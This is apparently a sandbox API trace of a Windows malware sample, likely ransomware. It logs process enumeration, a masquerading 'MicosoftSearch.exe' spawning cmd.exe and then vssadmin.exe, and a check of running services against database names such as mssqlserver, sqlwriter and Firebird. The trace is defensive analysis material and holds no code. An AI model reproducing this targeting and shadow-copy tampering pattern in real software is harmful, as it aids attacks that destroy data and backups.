[0040.736] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0040.736] lstrlenW (lpString="archive.exe") returned 11 [0040.736] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0040.737] lstrlenW (lpString="defend.exe") returned 10 [0040.737] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0040.738] lstrlenW (lpString="arservice.exe") returned 13 [0040.738] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0040.739] lstrlenW (lpString="rr-programmer.exe") returned 17 [0040.739] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0040.740] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0040.740] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0040.740] lstrlenW (lpString="twistedmonton.exe") returned 17 [0040.740] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0040.741] lstrlenW (lpString="arc plains.exe") returned 14 [0040.741] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0040.742] lstrlenW (lpString="americahousestip.exe") returned 20 [0040.742] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0040.742] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0040.742] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0040.743] lstrlenW (lpString="medical lectures.exe") returned 20 [0040.743] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0040.744] lstrlenW (lpString="electronic.exe") returned 14 [0040.744] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0040.745] lstrlenW (lpString="regression.exe") returned 14 [0040.745] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0040.745] lstrlenW (lpString="county.exe") returned 10 [0040.746] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0040.746] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0040.746] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0040.747] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0040.747] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0040.748] lstrlenW (lpString="cmd.exe") returned 7 [0040.748] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0040.748] lstrlenW (lpString="conhost.exe") returned 11 [0040.748] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0040.749] lstrlenW (lpString="vssadmin.exe") returned 12 [0040.749] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0040.750] lstrlenW (lpString="VSSVC.exe") returned 9 [0040.750] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.751] lstrlenW (lpString="svchost.exe") returned 11 [0040.751] Process32NextW (in: hSnapshot=0x1a0, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0040.751] CloseHandle (hObject=0x1a0) returned 1 [0040.752] Sleep (dwMilliseconds=0x1f4) [0041.607] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232d88 [0041.609] EnumServicesStatusExW (in: hSCManager=0x4232d88, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0041.610] GetLastError () returned 0xea [0041.610] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xba5bf8 [0041.610] EnumServicesStatusExW (in: hSCManager=0x4232d88, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba5bf8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5bf8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0041.611] CloseServiceHandle (hSCObject=0x4232d88) returned 1 [0041.612] lstrlenW (lpString="Appinfo") returned 7 [0041.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0041.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0041.612] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0041.612] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0041.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0041.612] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0041.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.612] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0041.612] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0041.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0041.612] lstrlenW (lpString="AudioSrv") returned 8 [0041.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0041.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0041.612] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0041.612] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0041.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0041.612] lstrlenW (lpString="BFE") returned 3 [0041.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0041.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0041.612] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0041.612] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0041.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0041.612] lstrlenW (lpString="CryptSvc") returned 8 [0041.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0041.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0041.612] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0041.613] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0041.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0041.613] lstrlenW (lpString="CscService") returned 10 [0041.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0041.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0041.613] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0041.613] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0041.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0041.613] lstrlenW (lpString="DcomLaunch") returned 10 [0041.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.613] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0041.613] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0041.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0041.613] lstrlenW (lpString="Dhcp") returned 4 [0041.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0041.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0041.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0041.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0041.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0041.613] lstrlenW (lpString="Dnscache") returned 8 [0041.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0041.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0041.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0041.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0041.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0041.613] lstrlenW (lpString="DPS") returned 3 [0041.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0041.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0041.614] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0041.614] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0041.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0041.614] lstrlenW (lpString="eventlog") returned 8 [0041.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0041.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0041.614] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0041.614] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0041.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0041.614] lstrlenW (lpString="EventSystem") returned 11 [0041.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0041.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0041.614] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0041.614] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0041.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0041.614] lstrlenW (lpString="gpsvc") returned 5 [0041.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0041.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0041.614] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0041.614] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0041.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0041.614] lstrlenW (lpString="iphlpsvc") returned 8 [0041.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.614] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0041.614] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0041.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0041.614] lstrlenW (lpString="LanmanServer") returned 12 [0041.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0041.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0041.615] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0041.615] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0041.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0041.615] lstrlenW (lpString="LanmanWorkstation") returned 17 [0041.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.615] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0041.615] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0041.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0041.615] lstrlenW (lpString="lmhosts") returned 7 [0041.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0041.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0041.615] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0041.615] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0041.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0041.615] lstrlenW (lpString="MMCSS") returned 5 [0041.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0041.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0041.615] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0041.615] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0041.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0041.615] lstrlenW (lpString="MpsSvc") returned 6 [0041.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0041.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0041.615] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0041.615] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0041.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0041.615] lstrlenW (lpString="Netman") returned 6 [0041.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0041.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0041.616] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0041.616] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0041.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0041.616] lstrlenW (lpString="netprofm") returned 8 [0041.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0041.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0041.616] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0041.616] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0041.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0041.616] lstrlenW (lpString="NlaSvc") returned 6 [0041.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0041.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0041.616] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0041.616] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0041.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0041.616] lstrlenW (lpString="nsi") returned 3 [0041.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0041.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0041.616] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0041.616] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0041.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0041.616] lstrlenW (lpString="PcaSvc") returned 6 [0041.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0041.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0041.616] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0041.616] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0041.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0041.617] lstrlenW (lpString="PlugPlay") returned 8 [0041.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0041.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0041.617] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0041.617] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0041.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0041.617] lstrlenW (lpString="Power") returned 5 [0041.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0041.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0041.617] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0041.617] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0041.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0041.617] lstrlenW (lpString="ProfSvc") returned 7 [0041.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0041.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0041.617] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0041.617] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0041.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0041.617] lstrlenW (lpString="RpcEptMapper") returned 12 [0041.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.617] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0041.617] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0041.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0041.617] lstrlenW (lpString="RpcSs") returned 5 [0041.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0041.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0041.617] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0041.617] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0041.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0041.618] lstrlenW (lpString="SamSs") returned 5 [0041.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0041.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0041.618] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0041.618] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0041.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0041.618] lstrlenW (lpString="Schedule") returned 8 [0041.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0041.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0041.618] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0041.618] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0041.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0041.618] lstrlenW (lpString="SENS") returned 4 [0041.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0041.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0041.618] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0041.618] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0041.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0041.618] lstrlenW (lpString="ShellHWDetection") returned 16 [0041.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.618] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0041.618] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0041.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0041.618] lstrlenW (lpString="Spooler") returned 7 [0041.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0041.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0041.618] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0041.619] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0041.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0041.619] lstrlenW (lpString="swprv") returned 5 [0041.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0041.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0041.619] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0041.619] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0041.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0041.619] lstrlenW (lpString="SysMain") returned 7 [0041.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0041.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0041.619] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0041.619] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0041.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0041.619] lstrlenW (lpString="Themes") returned 6 [0041.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0041.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0041.619] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0041.619] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0041.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0041.619] lstrlenW (lpString="TrkWks") returned 6 [0041.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0041.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0041.619] lstrcmpiW 